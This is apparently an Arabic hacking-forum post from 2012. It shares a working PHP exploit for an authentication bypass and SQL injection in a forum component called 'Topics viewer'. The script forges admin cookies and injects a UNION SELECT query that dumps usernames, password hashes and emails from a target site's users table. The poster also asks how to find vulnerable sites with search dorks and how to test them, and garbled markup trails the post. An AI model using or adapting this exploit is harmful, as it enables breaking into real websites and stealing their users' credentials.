السلام عليكم ورحمة الله وبركاته
المهم
حصلت ثغره جديده توها نزلت
http://pastebin.com/KqFCfyc3
فهمت تقريبآ 60%
| | | | | | <?
$host="http://www.el3drabyad.com/"; //ضع الموقع المصاب بدل هذا الموقع واستعرض الملف من المتصفح
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $host."/modcp/rmv_topic_pop.php?id=-1+/*!union*/+/*!SELeCT*/+1,group_concat(u_name,0x3a,u_mpass,0x3a,u_email), 3,4,5,6,7,8,9,10,11,12+/*!frOm*/+users--");
curl_setopt($ch, CURLOPT_******, "admin=ahwak2000;mod=ahwak2000;");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$buffer = curl_exec($ch);
if(strpos($buffer,"style.css"))
{
echo "<br> [-]---------------------------------------------[-]<br>";
$reg = '#<li .*>.*:(.*?)؟</span></li>#Us';
preg_match($reg,$buffer,$ahwak);
$s1=explode(",",$ahwak[1]);
$i=1;
foreach($s1 as $ayrik){
print "<br> <b>[$i] ".trim($ayrik)."</b><br>";
$i++;
}
echo "<br> [-]---------------------------------------------[-]<br><b><font color=red>z.u5@hotmail.com</font></b>";
}
?> | |  | |  | |
الي مافهمته هل استعرضه بمتداد html>?
+
دوركت لها لاني حآولت بها ماقدرت
+
كيف اعرف هل الموقع مصاب بالثغره ام لا
بنتضآركم
Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC p,g eyvm Topics viewer <= 2>3 Authentication Bypass & SQL Injection
07-05-2012, 09:12 AM
غير مجاب: حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection 
رد: حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection 
العرض العادي
